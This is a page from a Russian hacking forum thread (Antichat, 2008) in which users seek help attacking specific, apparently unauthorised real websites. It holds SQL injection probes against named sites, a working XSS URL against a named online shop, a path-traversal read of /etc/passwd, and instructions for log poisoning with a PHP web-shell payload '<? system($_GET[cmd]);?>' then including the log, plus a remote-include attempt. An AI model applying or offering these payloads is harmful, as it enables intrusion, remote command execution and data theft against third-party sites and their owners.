HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 71 из 2438 « Первая < 2161 67 68 69 70 71 72 73 74 75 811211715711071 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #701  
Старый 15.01.2008, 09:35
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 354
С нами: 9671366

Репутация: 332
По умолчанию
Помогите вот с этим :

MySQL error : You have an error in your SQL syntax near ''A variable type check failed, expecting G/INT for \"s\" : 20\' - /index.php?zh=' at line 1

URL: http://www.nu-44.ru/index.php?zh=topics&s=20'

и что можно получить из этого по максимуму.... тока не ломайте его он мне нужен рабочим плизззз
 
Ответить с цитированием

  #702  
Старый 15.01.2008, 09:46
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию
там фильтрация стоит навряд-ли, что можно сделать
 
Ответить с цитированием

  #703  
Старый 15.01.2008, 12:54
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 354
С нами: 9671366

Репутация: 332
По умолчанию
Хорошо а тогда что мона с этим сделать???
_http://shop.winm.ru/index.php?productID=262'

ошибка:
Цитата:
You have an error in your SQL syntax near ''262''' at line 1 SQL query : SELECT categoryID FROM SS_products WHERE productID='262''
Последний раз редактировалось KIR@PRO; 17.01.2008 в 02:58..
 
Ответить с цитированием

  #704  
Старый 15.01.2008, 12:57
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию
на тебе XSS'ку
Код:
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0
 
Ответить с цитированием

  #705  
Старый 15.01.2008, 16:46
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 354
С нами: 9671366

Репутация: 332
По умолчанию
На кой мне XSS я их итак тама сотними понаходил..... я же сказал мне надо сделать sql-inject
 
Ответить с цитированием

  #706  
Старый 15.01.2008, 16:49
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 354
С нами: 9671366

Репутация: 332
По умолчанию
Цитата:
Сообщение от it's my  
на тебе XSS'ку
Код:
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0
темболее это именна та которую самой первой нашел после 5 минут на сайте.... я ж написал подскажите проявите себя нужна sql-инъекция
 
Ответить с цитированием

  #707  
Старый 15.01.2008, 22:20
tusman
Познающий
Регистрация: 02.06.2007
Сообщений: 39
С нами: 9970148

Репутация: 15
По умолчанию
Народ как использовать данные уязвимости -
http://www.planeta.ua/fc/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
Если можно то по подробней пожалуйста !
Спасибо !
 
Ответить с цитированием

  #708  
Старый 15.01.2008, 23:32
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию
там кодес типа
PHP код:
...
include($_GET['filename']);
... 
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить

удалённый инклуд не катит ибо так настроен сервер
http://www.planeta.ua/fc/template.php?filename=http://toxa.nov.ru/z.txt
__________________
 
Ответить с цитированием

  #709  
Старый 16.01.2008, 00:56
tusman
Познающий
Регистрация: 02.06.2007
Сообщений: 39
С нами: 9970148

Репутация: 15
По умолчанию
Цитата:
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить
можно по подробней пожалуйста ! или где об этом можно почитать ?
 
Ответить с цитированием

  #710  
Старый 16.01.2008, 13:33
noneim
Новичок
Регистрация: 28.11.2007
Сообщений: 5
С нами: 9712206

Репутация: 0
По умолчанию
Код:
http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+GROUP+BY+1--
Вот эта инъёкция какая то странная... никак не могу врубится, почему не работают union, group by, и т.п., хотя через ; запросы выполняются
 
Ответить с цитированием
Ответ
Страница 71 из 2438 « Первая < 2161 67 68 69 70 71 72 73 74 75 811211715711071 > Последняя »



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.